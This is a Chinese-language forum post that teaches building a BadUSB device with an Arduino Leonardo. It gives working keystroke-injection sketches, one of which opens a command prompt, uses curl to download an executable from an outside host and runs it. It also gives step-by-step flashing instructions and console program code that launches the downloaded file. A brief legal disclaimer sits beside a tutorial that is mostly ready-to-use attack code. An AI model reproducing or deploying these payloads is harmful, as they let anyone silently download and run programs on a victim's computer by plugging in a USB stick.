用户名  找回密码
 请使用中文注册

手机号码,快捷登录

手机号码,快捷登录

查看: 652|回复: 0

插入U盘自动攻击电脑(慎用)

[复制链接]
阅读字号:

1368

主题

50

回帖

2万

积分

超级版主

积分
27457
发表于 2023-8-20 10:15:49 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?请使用中文注册

×
SHAO
首先介绍一下BadUSB Leonardo可以通过模拟键盘和鼠标输入,实际上就像是有一个看不见的U盘在操控着计算机。它可以执行各种任务,例如:
  • 恶意软件注入: BadUSB Leonardo可以模拟键盘输入,将恶意代码或命令注入到目标计算机中,从而控制计算机或窃取信息。
  • 自动化攻击: 它可以自动执行一系列攻击步骤,例如在短时间内多次输入错误密码,进行暴力破解,或者在无人监控的情况下执行恶意操作。
  • 社会工程学攻击: 利用伪造的输入,BadUSB Leonardo可以伪装成用户,进行欺骗性的操作,例如发送虚假的电子邮件或执行网络钓鱼攻击。
  • 系统崩溃: 通过模拟鼠标和键盘操作,它可以导致系统崩溃或无法正常工作。
  • 数据窃取: BadUSB Leonardo可以悄悄地复制文件、截取敏感信息或者通过网络将数据传输到其他地方。


写了一个BadUSB Leonardo的魔法咒语呢!它在模拟键盘操作,会对计算机进行一些操作。不过,我要再次提醒你,务必要负责任地使用技术,不要用于捣乱、非法活动或破坏他人的计算机系统。如果你有合法的目的,比如进行安全测试、编写脚本来提高效率,那是很好的。但要确保你了解你正在做的事情,并遵守相关法律和道德准则。让我们一起保护和平与友善的互联网世界吧!
#include <Keyboard.h>void setup() {//初始化  Keyboard.begin();//开始键盘通讯   delay(3000);//延时  Keyboard.press(KEY_LEFT_GUI);//win键   delay(200);   Keyboard.press('r');//r键   delay(200);   Keyboard.release(KEY_LEFT_GUI);  Keyboard.release('r');  Keyboard.press(KEY_CAPS_LOCK);  Keyboard.release(KEY_CAPS_LOCK);  delay(200);   Keyboard.println("HTTP://CHATPING.CN");  Keyboard.println();  Keyboard.press(KEY_CAPS_LOCK);  Keyboard.release(KEY_CAPS_LOCK);  Keyboard.end();//结束键盘通讯 }void loop()//循环{搞}
上方代码解释:
  • #include <Keyboard.h>:这行代码引入了一个名为Keyboard的库,它提供了模拟键盘操作的功能。
  • void setup():这是一个特殊的函数,用于初始化设置。
  • Keyboard.begin():这行代码启动了与键盘的通信,准备进行键盘模拟操作。
  • delay(3000):这行代码让程序暂停执行3000毫秒(3秒),给计算机一些时间来做准备。
  • Keyboard.press(KEY_LEFT_GUI):这行代码模拟按下左Windows键(也称为Super键)。
  • Keyboard.press('r'):这行代码模拟按下键盘上的字母’r’键。
  • Keyboard.release(KEY_LEFT_GUI)和Keyboard.release('r'):这两行代码分别模拟释放左Windows键和’r’键。
  • Keyboard.press(KEY_CAPS_LOCK)和Keyboard.release(KEY_CAPS_LOCK):这两行代码模拟按下和释放大写锁定键,用于确保输入的内容是大写的。
  • Keyboard.println("HTTP://CHATPING.CN"):这行代码模拟键盘输入,将字符串"HTTP://CHATPING.CN"输入到计算机中。
  • Keyboard.println():这行代码模拟键盘输入一个换行符,用于换行。
  • Keyboard.end():这行代码结束与键盘的通信。
  • void loop():这是另一个特殊的函数,用于循环执行。

总的来说,这段代码的功能是模拟键盘操作,按下左Windows键和’r’键,然后释放这两个键,接着按下和释放大写锁定键,最后输入字符串"HTTP://CHATPING.CN"并换行也就是说插入U盘自动打开我的网站。根据具体的应用场景,这段代码可能会用于自动化操作、快速输入文本或执行特定的任务。但请记住,使用这样的代码时要遵守法律和道德准则,确保不会用于非法或恶意目的。
写了一个远程下载exe,并且运行
#include <Keyboard.h>
void setup() {Keyboard.begin();delay(3000);// 打开运行框Keyboard.press(KEY_LEFT_GUI);delay(100);Keyboard.press('r');delay(100);Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r');delay(100);// 输入cmd并运行Keyboard.print("cmd");Keyboard.press(KEY_RETURN);delay(600);Keyboard.release(KEY_RETURN);delay(2000); // 等待命令提示符打开// 输入curl命令并运行Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.print("curl  -O  \"D:\\xiaomao.exe\"  -C  - http://chatc.vip/xiaomao.exe");Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);delay(10000); // 等待下载完成// 关闭命令提示符窗口// 运行下载的 xiaomao.exe 程序Keyboard.press(KEY_LEFT_GUI);delay(100);Keyboard.press('r');delay(100);Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r');delay(100);Keyboard.print("D:\\XIAOMAO.EXE\n"); // 输入要运行的程序路径Keyboard.press(KEY_RETURN);Keyboard.release(KEY_RETURN);
// 不关闭命令提示符窗口// 注释掉关闭命令提示符窗口的代码部分/*delay(5000); // 等待程序运行完成(根据需要调整等待时间)Keyboard.press(KEY_LEFT_ALT);Keyboard.press(KEY_F4);delay(100);Keyboard.release(KEY_LEFT_ALT);Keyboard.release(KEY_F4);*/}void loop() {// 循环中不需要添加任何代码}
将上方代码保存名为hack.ino,烧录到BadUsbU盘中

58fd6ee552a1edd1c39e2d8029437f2a.png

打开Arduino IDE  工具插入u盘选择自己的BadUsb U盘将攻击代码烧录进去

04d6bc706fae8c5f2f80abb09be8bf79.png
选择Arduino Micro

43a80344d50b371d9252884bf4ab5c49.png
点击上传代码,烧录u盘中,烧录成功后下次插入u盘会自动执行烧录的攻击代码
U盘插入笔记本视频演示效果:
视频里面代码雨弹窗代码:
#include <time.h>#include <Windows.h>#include <cstdio>
typedef struct RAINDROP {    int x, y;    char ch;} RAINDROP;
const int BUFFER_SIZE = 100;int WIDTH = 80;int HEIGHT = 30;const int RAIN_LENGTH = 18;
RAINDROP raindropLine[BUFFER_SIZE];HANDLE HOUT = GetStdHandle(STD_OUTPUT_HANDLE);
void gotoxy(int x, int y) {    COORD pos;    pos.X = x;    pos.Y = y;    SetConsoleCursorPosition(HOUT, pos);}
void show_cursor(BOOL hide) {    CONSOLE_CURSOR_INFO cciCursor;    if (GetConsoleCursorInfo(HOUT, &cciCursor)) {        cciCursor.bVisible = hide;        SetConsoleCursorInfo(HOUT, &cciCursor);    }}
void set_color(int color) {    SetConsoleTextAttribute(HOUT, color);}
int main() {  SetConsoleTitle("人工智能Ai网址http://h5.chatc.vip");    // 调用本身程序的命令    system( "start XIAOMAO.EXE");
    CONSOLE_SCREEN_BUFFER_INFO info;    GetConsoleScreenBufferInfo(HOUT, &info);    HEIGHT = info.srWindow.Bottom;    WIDTH = info.srWindow.Right;
    show_cursor(FALSE);    srand((unsigned int)time(NULL));
    for (int i = 0; i < BUFFER_SIZE; i++) {        raindropLine.x = rand() % WIDTH;        raindropLine.y = rand() % HEIGHT;        raindropLine.ch = rand() % 2 + 48;    }
    while (true) {        GetConsoleScreenBufferInfo(HOUT, &info);        HEIGHT = info.srWindow.Bottom;        WIDTH = info.srWindow.Right;
        for (int i = 0; i < BUFFER_SIZE; ++i) {            if (raindropLine.y <= HEIGHT) {                gotoxy(raindropLine.x, raindropLine.y);                set_color(FOREGROUND_GREEN);                putchar(raindropLine.ch);            }            gotoxy(raindropLine.x, raindropLine.y - RAIN_LENGTH);            putchar(' ');            raindropLine.y++;            raindropLine.ch = rand() % 2 + 48;            if (raindropLine.y > HEIGHT + RAIN_LENGTH) {                raindropLine.x = rand() % WIDTH;                raindropLine.y = rand() % HEIGHT;            }            if (raindropLine.y <= HEIGHT) {                gotoxy(raindropLine.x, raindropLine.y);                set_color(FOREGROUND_GREEN | FOREGROUND_INTENSITY);                putchar(raindropLine.ch);            }        }        Sleep(50);    }    getchar();    return 0;}
插在主机演示效果:
注:代码可以自己修改作为渗透测试,前提是授权测试,不作非法用途,否则后果自负。
.
f9e7ce683783cfd07162dcfbc261c730.png
ae081a10ec857885f9cbe1a0ccd9ee30.png
b05eaa99899f2325aab4eb3f053c9811.jpg
93e70f498921fd77d12e6224da5868b2.jpg
c53f1533fc1ea250aae090ef1a3ce932.jpg
9b8de35505528d3a70723ef681721035.png
fee9e2414d6e588d2d700ec39e5ac0d5.png
5e0211bfa5d0004c7204b5af1f67bcbe.png
3f379f566ce76dc714e75ae816d03d3a.png
481339cb8451e678bcae595f515143b3.png
您需要登录后才可以回帖 登录 | 请使用中文注册

本版积分规则

QQ|Archiver|手机版|家电维修论坛 ( 蜀ICP备19011473号-4 川公网安备51102502000164号 )

GMT+8, 2025-5-20 03:23 , Processed in 0.194834 second(s), 24 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表